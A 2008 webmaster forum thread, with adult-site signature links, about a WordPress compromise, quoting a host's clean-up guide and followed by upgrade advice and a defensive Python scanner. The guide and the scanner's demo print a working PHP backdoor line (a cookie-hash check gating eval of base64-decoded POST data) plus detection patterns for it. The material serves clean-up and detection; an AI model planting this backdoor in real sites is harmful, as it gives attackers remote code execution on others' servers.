Greenguy's Board


Old 2008-04-28, 01:43 PM   #1
walrus
Wordpress Exploits

They must be on the rise as I just received this e-mail from my new host
Quote:
Over the last couple of weeks there has been a widespread WordPress exploit that seems to have infected all versions of WordPress except for the most recent release (2.5.1) and has started to hit accounts hosted on our servers.
You can read more about the exploit here:

http://wordpress.org/support/topic/168964?replies=30

It has been noted that one exploited install on a server may affect all installs on the same server.
Besides upgrading your install to the most recent release, there are a few other things to look for and the steps required to clean-up the exploit.
Before doing anything please BACKUP your database(s). This can be done in your control panel under the "Database Management" link. The database backup will be placed in the /BACKUPS directory and accessible via FTP.


1) New files named wp-info.txt which contain database usernames and passwords.

This file will contain user info dumped from your database (emails, usernames, passwords, etc.)
If you do find this file, remove it AND change all of your passwords including your visitors' passwords.
On the few WordPress installs that we have investigated we have not come across this file yet, so this file may or may not exist on an infected install.


2) New files ending in _new, _old, .pngg, .jpgg, .giff appearing inside writable directories.

These files will have the same name as an existing file but will have one of the following extensions:

_new.php
_old.php
.php.pngg
.php.jpgg
.php.giff

These files are executable when called from a browser and will display a fake 404 error, but will display server system info when called from a script with the matching hash from one of the hacked php scripts.
Delete these files if found.


3) Extra code added to the first line of PHP files.

This code is added to the first line of php files and provides access to the backdoor account.
The letters and numbers in the code may vary from the following, but it will have the same format:

<?php if(md5($_COOKIE['_wp_debugger'])=="dfa1bcf40aa72fdb46ed40f7651fe76e"){ eval(base64_decode($_POST['file'])); exit; } ?>

This code will need to be removed from each file.
On the few WordPress installs that we have investigated, this line has only been seen in files with the extensions from step 2.


4) New "WordPress" user in database (hidden in the admin panel user's page).

This user will have no info saved for password and an add date of all zeroes.
You will need to delete this user. You can do this via phpMyAdmin. There is a link to phpMyAdmin in your control panel Database Management page.
Browse the wp_users table and remove the "WordPress" user.


5) WordPress version changed to 2.5

Although you are running an older version of WordPress, your admin panel may say that you are running version 2.5
Entries in your wp_options table > active_plugins record may have entries similar to the following:

i:3;s:54:"../../wp-content/themes/xxxx/404_old.gif";
i:4;s:117:"../../../../../../../../../../../../../../../../../../../../../../tmp/tmpnyQVsn/sess_1695814591293aea19710bfb3dcfc0b9";

Remove these entries by editing the record with phpMyAdmin.
Browse the wp_options table and edit the active_plugins record.


6) Upgrade your WordPress to the most recent version.

Upgrade immediately.
You can download version 2.5.1 here: http://wordpress.org/latest.zip
Instructions for upgrading your install can be found here: http://codex.wordpress.org/Upgrading_WordPress

Although WordPress suggests/requires some directories to be 777 to function, do NOT set them to 777.
Specifically the /wp-uploads, /wp-themes, and /wp-plugins directories are set to 777 so that you can edit them in the administration panel, but this is an open door for a hacker.
755 is the maximum permissions that should be set on any directory.


If you believe your WordPress install has been exploited, open a ticket (support@atcihosting.com) and we can run a search and removal of the files listed in steps 1 and 2.
You will need to complete the rest of the steps in order to clean your install.


Please contact us with any questions.
So on top of trying to get something going on XXX Blog and Porn Blog Surfer...and having lost the database to LO...I now get to upgrade all of my WP installs, change out plug-ins, and modify templates for the new WP.

Sometimes the gods just like to fuck with you!
__________________
Naked Girlfriend Porn TGP
free partner account
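A defender's triage script, added here and not from the thread or the host, that checks a WordPress tree for the indicators the host's e-mail lists: the suspicious extensions from step 2, the first-line backdoor from step 3 (matched by its shape, since the hash varies per install), stray active_plugins entries from step 5, and the world-writable directories the mail warns against. The function names and the sample install and hash built by demo() are constructed for illustration.

```python
import os
import re
import stat
import tempfile

# Indicators quoted from the host's clean-up mail above.
SUSPECT_SUFFIXES = ("_new.php", "_old.php", ".php.pngg", ".php.jpgg", ".php.giff")
# First-line backdoor: a cookie-hash gate around eval(base64_decode($_POST[...])).
# The hash differs per install, so match the shape rather than one literal value.
BACKDOOR_RE = re.compile(
    r"md5\(\$_COOKIE\[[^\]]+\]\)\s*==\s*['\"][0-9a-f]{32}['\"].*eval\(base64_decode\(\$_POST")
PLUGIN_ENTRY_RE = re.compile(r's:\d+:"([^"]*)";')  # string members of PHP's serialized array

def is_suspect_name(name):
    return name.endswith(SUSPECT_SUFFIXES)

def has_backdoor_line(line):
    return BACKDOOR_RE.search(line) is not None

def suspicious_plugin_entries(serialized):
    """active_plugins members that climb out of the plugins directory or are not .php files."""
    return [p for p in PLUGIN_ENTRY_RE.findall(serialized) if ".." in p or not p.endswith(".php")]

def scan_tree(root):
    """Return (suspect-named files, files whose first line is the backdoor, world-writable dirs)."""
    suspect, backdoored, writable = [], [], []
    for dirpath, dirnames, filenames in os.walk(root):
        for d in dirnames:
            if os.stat(os.path.join(dirpath, d)).st_mode & stat.S_IWOTH:
                writable.append(os.path.join(dirpath, d))
        for f in filenames:
            full = os.path.join(dirpath, f)
            if is_suspect_name(f):
                suspect.append(full)
            if f.endswith(".php") or is_suspect_name(f):
                with open(full, errors="replace") as fh:
                    if has_backdoor_line(fh.readline()):
                        backdoored.append(full)
    return sorted(suspect), sorted(backdoored), sorted(writable)

def demo():
    """Scan a constructed sample install in a temp dir (the hash below is made up)."""
    root = tempfile.mkdtemp()
    uploads = os.path.join(root, "wp-content", "uploads")
    os.makedirs(uploads)
    os.chmod(uploads, 0o777)  # the world-writable directory the thread warns about
    with open(os.path.join(uploads, "404_old.php"), "w") as fh:
        fh.write('<?php if(md5($_COOKIE[\'_wp_debugger\'])=="0123456789abcdef0123456789abcdef")'
                 '{ eval(base64_decode($_POST[\'file\'])); exit; } ?>\n')
    return scan_tree(root)
```

Run scan_tree() against the real document root and suspicious_plugin_entries() against the active_plugins value exported from wp_options; anything it flags still needs the manual steps from the mail (delete, then re-activate plugins so WordPress rewrites the record).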
Old 2008-04-28, 09:25 PM   #2
Ms Naughty
I shall name today "Upgrade day."
__________________
Promote Bright Desire
Old 2008-04-29, 02:03 AM   #3
Fonz
Hmmm... I might do some upgrades today if I find a few spare minutes...
__________________
See how I abuse little trees on my Shumi no Bonsai Blog
Old 2008-04-29, 08:00 AM   #4
Simon
Remember that one thing added to 2.5.x is a new constant called SECRET_KEY in your wp-config.php file. So if you're used to not creating a new wp-config.php file during an upgrade, be sure that you do it this time. Just enter the config info from your old file into your new one, and set your 'secret phrase' as instructed. This will help secure your blog too.
__________________
"If you're happy and you know it, think again." -- Guru Pitka
Old 2008-04-29, 12:34 PM   #5
ronnie
Looks like we have the same host..
Old 2008-04-29, 07:19 PM   #6
ronnie
Gee, I went to post on my newly upgraded blog and for some reason the add image function was not working. I went to check the permission settings on my uploads folder, thinking maybe my host changed it because of all the problems. Come to find out, I found all the stuff everyone was talking about! AARGGHH. lol

Sneaky, the blog looked all right and seemed all right.

Here is a very prime example why you shouldn't have anything permissioned to 777. Remember someone not long ago saying to set themes to 777. If mine was I would have stuff in there as well. I was dumb enough to have/leave my uploads to 777 and that's the only place I found the garbage.

People, don't have anything set to 777! Doesn't take any longer to edit themes in a web editor either.
Old 2008-04-29, 07:23 PM   #7
ronnie
Quote:
Originally Posted by Simon View Post
Remember that one thing added to 2.5.x is a new constant called SECRET_KEY in your wp-config.php file. So if you're used to not creating a new wp-config.php file during an upgrade, be sure that you do it this time. Just enter the config info from your old file into your new one, and set your 'secret phrase' as instructed. This will help secure your blog too.
I am kinda confused. In the new 2.5.1 config file it says you do not have to remember the secret key. If so, what is it for then? Thought it was like a password or secret password.
Old 2008-04-29, 07:55 PM   #8
Simon
Ronnie, that's correct, you'll never need to enter the SECRET_KEY anywhere else. WordPress uses what's entered in your wp-config.php file to help make more-secure cookies.

One very important note for anyone who installed a fresh copy of 2.5.x and just left the default value in the SECRET_KEY. If you leave it that way you're making it very easy for hackers since they can use that default value ("put your unique phrase here") to find their way into some places you'd rather they stay out of.

Generate a unique SECRET_KEY for each blog by using this link...
http://api.wordpress.org/secret-key/1.0/
__________________
"If you're happy and you know it, think again." -- Guru Pitka
Old 2008-04-29, 08:15 PM   #9
Ms Naughty
Thanks for the info on the secret key stuff Simon. I should read the documentation a bit more!
__________________
Promote Bright Desire
Old 2008-04-29, 08:17 PM   #10
ronnie
Thanks Simon, makes sense... And ya, can see how leaving the default will make it easier for hackers to find.

Somewhat similar to leaving the WP default passwords, for reasons I am not going to say (least with 2.3.x), it's pretty easy to at least narrow it down by quite a bit.

One thing also for anyone getting rid of this exploit, or reading this, kinda got me stuck for a second. Step 5 is kind of vague. You need to remove that entry completely from the DB, which will deactivate all your plugins. Then go back in and activate your plugins and WP will add the right entry for that field. At first, I wasn't totally sure if I needed to completely remove it and if I did, if it would mess up my plugins.

As I mentioned, the image add on one of my blogs was not working; I did the steps above and now it works like a charm.

Last edited by ronnie; 2008-04-29 at 08:33 PM..
Old 2008-04-29, 09:26 PM   #11
ronnie
One other thing, the above steps are kind of off. You should do step 5 first, then back up your database, otherwise you're just backing up the exploit.

You could make a mental note, but I know I'd forget in a couple weeks..
Old 2008-04-29, 10:44 PM   #12
Trev
Thanks Walrus. I was going back and forth on whether or not I should upgrade our blogs and this made it clear that it was time. Six upgrades later (4 of which have never been used - 2 really old), here I sit hoping all is well.

Thanks also, Simon.
__________________
Hey buddy... can you spare a sig?
Old 2008-04-30, 02:44 AM   #13
blogman
Great post, thanks man
__________________
There is no money in porn adult messages aggregator.
Old 2008-04-30, 11:11 AM   #14
ronnie
Finally done, 15 blogs upgraded and hopefully more secure.

I found this crap on every one of my blogs, including my mainstream one.

Actually I think it was a good thing this happened, oddly enough. I was forced to backup, blogs more secure, upgraded to the latest and greatest WP and got to clean up a bunch of junk like unused themes and plug-ins. So not all bad..